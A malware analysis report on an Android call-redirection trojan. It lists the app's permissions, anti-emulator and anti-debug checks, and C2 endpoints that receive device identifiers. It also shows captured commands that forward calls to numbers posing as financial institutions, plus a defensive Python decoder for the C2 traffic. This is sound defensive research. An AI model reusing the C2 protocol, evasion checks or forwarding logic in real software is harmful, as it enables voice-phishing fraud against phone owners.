Basic Information:
---------------------------------------------------
Target OS: Android
File Type: Android archive file
File Size: 7.2M 
Package Name: net.twotwentyone7.tek.views20210311
SDK Version: 21
Main Activity: net.twotwentyone7.tek.views.MainActivitys
MD5SUM: d64d2ea841dbda0b56124d152866e602
Nation: Asia/Korea
---------------------------------------------------

Permissions:
---------------------------------------------------
- android.permission.FLASHLIGHT
- android.permission.PROCESS_OUTGOING_CALLS (RISKY)
- android.permission.CAMERA (RISKY)
- android.permission.READ_CALL_LOG (RISKY)
- android.permission.READ_CONTACTS (RISKY)
- android.permission.RECORD_AUDIO (RISKY)
- android.permission.READ_PHONE_NUMBERS (RISKY)
- android.permission.ACCESS_WIFI_STATE
- android.permission.FOREGROUND_SERVICE
- android.permission.REQUEST_IGNORE_BATTERY_OPTIMIZATIONS
- android.permission.WRITE_EXTERNAL_STORAGE (RISKY)
- android.permission.CALL_PHONE (RISKY)
- android.permission.WAKE_LOCK
- android.permission.RECEIVE_BOOT_COMPLETED
- android.permission.ACCESS_NETWORK_STATE
- android.permission.CHANGE_WIFI_STATE
- android.permission.READ_EXTERNAL_STORAGE (RISKY)
- android.permission.GET_TASKS
- android.permission.ACCESS_FINE_LOCATION (RISKY)
- android.permission.RECEIVE_USER_PRESENT
- android.permission.REORDER_TASKS
- android.permission.DISABLE_KEYGUARD
- android.permission.READ_PHONE_STATE (RISKY)
- android.permission.INTERNET
- android.permission.SYSTEM_ALERT_WINDOW
- android.permission.WRITE_CALL_LOG (RISKY)
- android.permission.READ_SMS (RISKY)
- android.permission.WRITE_CONTACTS (RISKY)
- android.permission.MODIFY_AUDIO_SETTINGS
- android.permission.ANSWER_PHONE_CALLS (RISKY)
---------------------------------------------------

Features:
-------------------------------------
- android.hardware.camera
- android.hardware.camera.autofocus
- android.hardware.telephony
-------------------------------------

Activities:
----------------------------------------------------
- net.twotwentyone7.tek.views.MainActivitys
- com.defmon.life.views.OneDPActivity
- net.twotwentyone7.tek.found.phone.DialerActivity
----------------------------------------------------

Services:
------------------------------------------------
- net.twotwentyone7.tek.services.MainServices
- net.twotwentyone7.tek.services.StandOutService
- net.twotwentyone7.tek.services.StandInService
- com.defmon.life.ser.LocalSev
- com.defmon.life.ser.HideForegroundServ
- com.defmon.life.ser.JobHandlServ
- com.defmon.life.ser.RemoteSer
- net.twotwentyone7.tek.found.phone.CallServ
- net.twotwentyone7.tek.found.phone.notify.NotiServ
- net.twotwentyone7.tek.lie.LSServ
- net.twotwentyone7.tek.lie.SoundServ
------------------------------------------------

Receivers:
-------------------------------------------
- net.twotwentyone7.tek.cast.CallListener
- com.defmon.life.rev.NotificationClickRev
-------------------------------------------

Protection:
------------------------------------------
- Anti Virtualization Codes
 \
  |--> Build.FINGERPRINT check
  |--> Build.MODEL check
  |--> Build.MANUFACTURER check
  |--> Build.BRAND check
  |--> Build.DEVICE check
  |--> Build.PRODUCT check
  |--> Build.HARDWARE check
  |--> Build.BOARD check
  |--> possible Build.SERIAL check
  |--> Build.TAGS check
  |--> SIM operator check
  |--> network operator name check

- Anti Debug Codes
 \
  |--> Debug.isDebuggerConnected() check
------------------------------------------

Domain Strings:
-------------------------------------------------------
- Extracted Possible IP Addresses
 \
  |--> 127.0.0.1 => Localhost
  |--> 10.0.0.172 => RFC 1918 private address (also the China Mobile CMWAP proxy address commonly hard-coded by Chinese SDKs, so likely an SDK artefact rather than infrastructure)
  |--> 103.93.79.32
    |--> Host is up.
    |--> Country: Japan
    |--> VT says: "10+ detected files communicating with this IP address"
    |--> According to VT relations this IP address is C2 infrastructure.

- Extracted URLs
 \
  |--> http://www.slf4j.org/codes.html#no_static_mdc_binder
  |--> https://developer.umeng.com/docs/66632/detail/
  |--> http://www.slf4j.org/codes.html#unsuccessfulInit
  |--> http://www.slf4j.org/codes.html#StaticLoggerBinder
  |--> https://docs.sentry.io/learn/quotas/
  |--> http://schemas.android.com/apk/res-auto
  |--> https://docs.sentry.io/clients/java/config/
  |--> https://docs.sentry.io/clients/java/modules/android/
  |--> https://cmnsguider.yunos.com:443/genDeviceToken
  |--> https://lark.alipay.com/yj131525/byt0wl/ufnf3i#A10200
  |--> http://www.slf4j.org/codes.html#version_mismatch
  |--> http://www.slf4j.org/codes.html#multiple_bindings
  |--> http://developer.umeng.com/docs/66650/cate/66650
  |--> http://www.slf4j.org/codes.html#replay
  |--> http://schemas.android.com/apk/res/android
  |--> https://docs.sentry.io/clients/java/config/#in-application-stack-frames
  |--> http://www.slf4j.org/codes.html#substituteLogger
  |--> http://www.slf4j.org/codes.html#loggerNameMismatch
  |--> https://developer.umeng.com/docs/66632/detail/70018?um_channel=sdk
  |--> http://www.slf4j.org/codes.html#null_MDCA
  |--> https://docs.sentry.io/clients/java/
  (These URLs are documentation and service endpoints embedded by bundled third-party SDKs: SLF4J, Sentry, Umeng and Alibaba YunOS/Alipay. They are not operator infrastructure; the live C2 is listed under Connections.)
--------------------------------------------------------

Connections:
-------------------------------------------------------
- http://103.159.80.61:8700/api/signal/7264f45980534a6d/WiFi/
 \
  |--> Method: GET

- http://103.159.80.61:8889/socket.io/?RzvXXa98mJ1uPNW5=...&EIO=3&sid=bmPhUHpuCys85UKPAJ1k&transport=polling
 \
  |--> Method: GET, POST

- http://103.159.80.61:8700/api/default-dialer
 \
  |--> Method: POST

Connection Summary: The program keeps a Socket.IO channel (Engine.IO v3, long-polling with websocket upgrade) to 103.159.80.61:8889 and posts to a REST API on :8700. It reports a device identifier (the "imei" field, 7264f45980534a6d, is 16 hex digits, i.e. ANDROID_ID format rather than a real IMEI), battery level, connectivity type (WiFi) and whether it is the default dialer, and receives "order" commands back (getCurrentStatus, getDefaultDialer, getSettingsData, setForwardNumber with a target number, forwardList with institution names and numbers). Together with the CALL_PHONE, ANSWER_PHONE_CALLS, PROCESS_OUTGOING_CALLS and default-dialer behaviour this is consistent with call-redirection tooling. Note that the live C2 address differs from the 103.93.79.32 string hard-coded in the APK.
-------------------------------------------------------

Touched Directories:
-----------------------------------------------
- cacheDirectory: /data/user/0/net.twotwentyone7.tek.views20210311/cache
- codeCacheDirectory: /data/user/0/net.twotwentyone7.tek.views20210311/code_cache
- externalCacheDirectory: /storage/emulated/0/Android/data/net.twotwentyone7.tek.views20210311/cache
- filesDirectory: /data/user/0/net.twotwentyone7.tek.views20210311/files
- obbDir: /storage/emulated/0/Android/obb/net.twotwentyone7.tek.views20210311
- packageCodePath: /data/app/net.twotwentyone7.tek.views20210311-1/base.apk
-----------------------------------------------

Interesting Sightings:
------------------------------------------------------------
- It sometimes detects Frida and interrupts analysis
 \
  |--> Automatically shuts the program down
** Solution: if you reboot the phone you can quickly open this program with Frida (for a while!!)

- Interesting network payloads...
 \
  |--> Payload: 63:42["batteryLevelChange",{"imei":"7264f45980534a6d","level":30}]63:42["batteryLevelChange",{"imei":"7264f45980534a6d","level":30}]70:42["order",{"order":"setForwardNumber","forwardNumber":"07078931467"}]
  |--> Payload: 40:42["order",{"order":"getCurrentStatus"}]40:42["order",{"order":"getDefaultDialer"}]39:42["order",{"order":"getSettingsData"}]86:42["signalChange",{"device":"","message":{"imei":"7264f45980534a6d","signal":"WiFi"}}]86:42["si
  |--> Payload: 96:0{"sid":"lpLgDERdlkJE8AEJAJ1r","upgrades":["websocket"],"pingInterval":10000,"pingTimeout":5000}2:40
  |--> Payload: 40:42["order",{"order":"getCurrentStatus"}]40:42["order",{"order":"getDefaultDialer"}]39:42["order",{"order":"getSettingsData"}]
  |--> Payload: 96:0{"sid":"bmPhUHpuCys85UKPAJ1k","upgrades":["websocket"],"pingInterval":10000,"pingTimeout":5000}2:40
  |--> Payload: 21:42["forward-list",""]19:42["black-list",""]21:42["getFakerCall",""]47:42["batteryLevelChanged",29,"7264f45980534a6d"]25:42["getForwardNumber",""]47:42["batteryLevelChanged",29,"7264f45980534a6d"]
  |--> Payload: 44:42["currentStatus","7264f45980534a6d",false]
  |--> Payload: 63:42["batteryLevelChange",{"imei":"7264f45980534a6d","level":29}]63:42["batteryLevelChange",{"imei":"7264f45980534a6d","level":29}]57496:42["order",{"order":"forwardList","forwardList":[{"name":"롯데캐피탈","number":"157
  |--> Payload: 96:0{"sid":"s4rBI0Mp3ujlQFGUAJ1l","upgrades":["websocket"],"pingInterval":10000,"pingTimeout":5000}2:40
  |--> Payload: 96:0{"sid":"0TYrDSPpAgVzQbdZAJ1n","upgrades":["websocket"],"pingInterval":10000,"pingTimeout":5000}2:40
  |--> Payload: 96:0{"sid":"qVNnQSt0c3kzU8qJAJ1o","upgrades":["websocket"],"pingInterval":10000,"pingTimeout":5000}2:40
  |--> Payload: 47:42["batteryLevelChanged",29,"7264f45980534a6d"]
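The payloads above are Engine.IO long-polling frames ("<length>:<packet>" concatenated, protocol v3 as the EIO=3 parameter in the captured URL indicates) carrying Socket.IO events. The following Python decoder is an added example for this report, not code from the sample or from the original author; it assumes Engine.IO v3 framing and Socket.IO v2 packet layout, and uses two of the captured payloads listed above as sample input. It splits frames, unwraps events, pulls out the server-side "order" commands, and refuses to guess on truncated captures such as the `86:42["si` fragment.

```python
"""Decode Engine.IO v3 / Socket.IO long-polling frames captured from the C2.

Added example, not code from the sample. Assumes Engine.IO protocol v3
framing ("<length>:<packet>" repeated), matching EIO=3 in the captured URL.
"""
import json
from typing import Any

# Engine.IO packet types (first character of every frame)
EIO_TYPES = {"0": "open", "1": "close", "2": "ping", "3": "pong",
             "4": "message", "5": "upgrade", "6": "noop"}
# Socket.IO packet types (first character inside an Engine.IO "message")
SIO_TYPES = {"0": "CONNECT", "1": "DISCONNECT", "2": "EVENT", "3": "ACK",
             "4": "ERROR", "5": "BINARY_EVENT", "6": "BINARY_ACK"}

# Sample input: payloads copied verbatim from the captures listed in this report.
CAPTURED_HANDSHAKE = ('96:0{"sid":"lpLgDERdlkJE8AEJAJ1r","upgrades":["websocket"],'
                      '"pingInterval":10000,"pingTimeout":5000}2:40')
CAPTURED_POLL = ('63:42["batteryLevelChange",{"imei":"7264f45980534a6d","level":30}]'
                 '63:42["batteryLevelChange",{"imei":"7264f45980534a6d","level":30}]'
                 '70:42["order",{"order":"setForwardNumber","forwardNumber":"07078931467"}]')


def split_frames(payload: str) -> list[str]:
    """Split a polling payload into raw packets.

    <length> counts characters (UTF-16 code units in the reference JS
    implementation, which equals len() for the BMP text seen here). A frame
    that declares more characters than remain is a truncated capture, so
    raise instead of returning a partial packet.
    """
    frames: list[str] = []
    i = 0
    while i < len(payload):
        colon = payload.index(":", i)
        length = int(payload[i:colon])
        start, end = colon + 1, colon + 1 + length
        if end > len(payload):
            raise ValueError(f"truncated frame at offset {i}: declared {length} "
                             f"chars, only {len(payload) - start} left")
        frames.append(payload[start:end])
        i = end
    return frames


def decode_packet(frame: str) -> dict[str, Any]:
    """Decode one Engine.IO packet and unwrap a Socket.IO EVENT if present."""
    eio = EIO_TYPES.get(frame[:1], "unknown")
    body = frame[1:]
    if eio == "open":
        return {"eio": eio, "handshake": json.loads(body)}
    if eio != "message" or not body:
        return {"eio": eio, "raw": body}
    sio = SIO_TYPES.get(body[0], "unknown")
    rest = body[1:]
    namespace = "/"
    if rest.startswith("/"):            # optional "/nsp," prefix
        nsp_end = rest.index(",")
        namespace, rest = rest[:nsp_end], rest[nsp_end + 1:]
    ack_id = ""
    while rest[:1].isdigit():           # optional ack id before the JSON array
        ack_id, rest = ack_id + rest[0], rest[1:]
    out: dict[str, Any] = {"eio": eio, "sio": sio, "namespace": namespace}
    if ack_id:
        out["ack_id"] = int(ack_id)
    if sio == "EVENT":
        data = json.loads(rest)          # ["eventName", arg1, arg2, ...]
        out["event"], out["args"] = data[0], data[1:]
    else:
        out["raw"] = rest
    return out


def decode_payload(payload: str) -> list[dict[str, Any]]:
    return [decode_packet(f) for f in split_frames(payload)]


def extract_orders(payload: str) -> list[dict[str, Any]]:
    """Return the {"order": ...} objects the server pushes to the implant."""
    return [p["args"][0] for p in decode_payload(payload)
            if p.get("event") == "order" and p.get("args")]


if __name__ == "__main__":
    for pkt in decode_payload(CAPTURED_HANDSHAKE) + decode_payload(CAPTURED_POLL):
        print(pkt)
    print("orders:", extract_orders(CAPTURED_POLL))
```

Feed it the body of each polling GET/POST from a Wireshark export to get a clean event log; once the transport upgrades to websocket the same `decode_packet` applies to each websocket text frame, only without the length prefix.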

- Executing OS commands via "sh"
- Root checking
 \
  |--> Code: check_su_binary(new String[]{"/system/xbin/which", "su"});

- Reading disk stats from "/proc/diskstats"
- Checking "thermal_zone" (real devices expose /sys/class/thermal/thermal_zoneN entries; their absence is a common emulator-detection heuristic)
 \
  |--> Code: r1 = a("ls /sys/class/thermal", "thermal_zone");
-------------------------------------------------------------

Function Hooks:
------------------------------------------------------------
- When the program is executed
 \
  |--> net.twotwentyone7.tek.views.MainActivitys.onCreate
  |--> net.twotwentyone7.tek.views.MainActivitys.onResume
  |--> net.twotwentyone7.tek.views.MainActivitys.b
    |--> net.twotwentyone7.tek.views.MainActivitys.onResume()
    |--> net.twotwentyone7.tek.views.MainActivitys.onResume(Native Method)
    |--> android.app.Instrumentation.callActivityOnResume(Instrumentation.java:1287)
    |--> android.app.Activity.performResume(Activity.java:7015)
    |--> android.app.ActivityThread.performResumeActivity(ActivityThread.java:4210)
    |--> android.app.ActivityThread.handleResumeActivity(ActivityThread.java:4323)
    |--> android.app.ActivityThread.handleLaunchActivity(ActivityThread.java:3426)
    |--> android.app.ActivityThread.access$1100(ActivityThread.java:229)
    |--> android.app.ActivityThread$H.handleMessage(ActivityThread.java:1821)
    |--> android.os.Handler.dispatchMessage(Handler.java:102)
    |--> android.os.Looper.loop(Looper.java:148)
    |--> android.app.ActivityThread.main(ActivityThread.java:7325)
    |--> java.lang.reflect.Method.invoke(Native Method)
    |--> com.android.internal.os.ZygoteInit$MethodAndArgsCaller.run(ZygoteInit.java:1230)
    |--> com.android.internal.os.ZygoteInit.main(ZygoteInit.java:1120)

- When filling in the form and tapping the send button (the WebView navigation is intercepted in shouldOverrideUrlLoading)
 \
  |--> net.twotwentyone7.tek.views.MainActivitys.c
    |--> net.twotwentyone7.tek.views.MainActivitys$b.shouldOverrideUrlLoading()
    |--> org.chromium.android_webview.AwContentsClientBridge.shouldOverrideUrlLoading(chromium-SystemWebViewGoogle.aab-stable-438908600:15)
    |--> android.os.MessageQueue.nativePollOnce(Native Method)
    |--> android.os.MessageQueue.next(MessageQueue.java:323)
    |--> android.os.Looper.loop(Looper.java:135)
    |--> android.app.ActivityThread.main(ActivityThread.java:7325)
    |--> java.lang.reflect.Method.invoke(Native Method)
    |--> com.android.internal.os.ZygoteInit$MethodAndArgsCaller.run(ZygoteInit.java:1230)
    |--> com.android.internal.os.ZygoteInit.main(ZygoteInit.java:1120)
-------------------------------------------------------------

Detected by:
-------------------------------------------------------
- VirusTotal
 \
  |--> 33/61

- Hybrid Analysis
 \
  |--> MetaDefender
   \-> 15%
   /
  |--> VirusTotal
   \-> 54%

- Scan reports
 \
  |--> VirusTotal
   \-> https://www.virustotal.com/gui/file/dd679ed92ab85e7b3f6d6b8996f681ba07b8e5afd7cf38a33b4edac38f392f4d/relations
   /
  |--> Hybrid Analysis
   \-> https://www.hybrid-analysis.com/sample/dd679ed92ab85e7b3f6d6b8996f681ba07b8e5afd7cf38a33b4edac38f392f4d
   \-> https://www.hybrid-analysis.com/sample/dd679ed92ab85e7b3f6d6b8996f681ba07b8e5afd7cf38a33b4edac38f392f4d/604fbfb2e0ca302d40580a7e
-------------------------------------------------------

Used Tools During Tests:
------------------------------------------
- Qu1cksc0pe
 \
  |--> https://github.com/CYB3RMX/Qu1cksc0pe

- MobSF
 \
  |--> https://github.com/MobSF/Mobile-Security-Framework-MobSF

- Objection
 \
  |--> https://github.com/sensepost/objection

- arpspoof (built into ParrotOS)
- Wireshark
- Apktool
- Frida
- Base64 decoder
 \
  |--> https://www.base64decode.org/
------------------------------------------
